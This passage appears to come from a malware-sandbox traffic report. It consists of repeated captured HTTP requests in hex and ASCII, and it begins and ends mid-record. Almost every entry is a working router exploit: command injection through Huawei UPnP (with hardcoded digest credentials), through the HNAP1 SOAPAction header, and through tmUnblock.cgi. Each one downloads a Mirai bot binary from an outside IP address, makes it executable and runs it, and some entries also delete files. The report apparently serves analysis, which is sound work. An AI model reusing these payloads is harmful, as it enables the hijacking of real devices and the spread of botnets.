0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 